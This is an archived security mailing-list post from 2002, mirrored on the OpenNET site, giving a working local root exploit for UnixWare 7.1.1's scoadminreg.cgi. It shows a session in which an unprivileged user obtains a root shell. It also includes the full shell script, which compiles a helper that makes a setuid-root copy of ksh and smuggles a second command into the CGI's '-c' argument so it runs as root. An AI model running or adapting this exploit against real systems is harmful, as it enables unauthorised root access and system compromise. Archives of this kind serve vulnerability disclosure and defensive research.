OpenNET security: Unixware 7.1.1 scoadminreg.cgi local exploit

Unixware 7.1.1 scoadminreg.cgi local exploit


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Date: 20 Jan 2002 23:30:16 -0000
From: "jGgM." <[email protected]>
To: [email protected]
Subject: Unixware 7.1.1 scoadminreg.cgi local exploit



unixware:~> uname -a
UnixWare unixware 5 7.1.1 i386 x86at SCO 
UNIX_SVR5
unixware:~> id
uid=101(mearee) gid=1(other)
unixware:~> ./scoadminreg.sh 

jGgM root exploit
http://www.netemperor.com/

Mail: [email protected]

Manager: -c /tmp/jggm;/tmp/jggm;
ERROR: Cannot find a Webtop object associated 
with -c /tmp/jggm
ERROR: Could not add object  ()
RESULT: Error: Object ".../_ens/Org" already exists.
Location: /webtop/webtops/en_US/admin/scoadminre
gError.html

Success...
# id
uid=101(mearee) gid=1(other) euid=0(root)
# 

It can remote attack...maybe... :))

-----------------------------------------------
Korean Security Forum.
http://www.forsecure.com
http://www.netemperor.com
-----------------------------------------------

Here is file...

--------------------------------------------------------------
#!/bin/sh

CC="gcc"
SCOADMIN=/opt/webtop/bin/i3un0212/cgi-
bin/admin/scoadminreg.cgi

#
#
#
#

echo
echo "jGgM root exploit"
echo "http://www.netemperor.com/"
echo
echo "Mail: [email protected]"
echo

if [ ! -x $SCOADMIN ]; then
   echo "$SCOADMIN file not found"
   exit 2;
fi

cat >/tmp/jggm.c <<_EOF

main()
{
   setuid(0);
   setgid(0);
   chown("/tmp/jGgM_Shell", 0, 0);
   chmod("/tmp/jGgM_Shell", 04755);
}
_EOF

cp /bin/ksh /tmp/jGgM_Shell
$CC -o /tmp/jggm /tmp/jggm.c

$SCOADMIN "-c /tmp/jggm;/tmp/jggm;"

rm -rf /tmp/jggm /tmp/jggm.c

/tmp/jGgM_Shell

# end of file..
-----------------------------------------------------------------


<< Previous	INDEX	Search	src	Set bookmark	Go to bookmark	Next >>

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру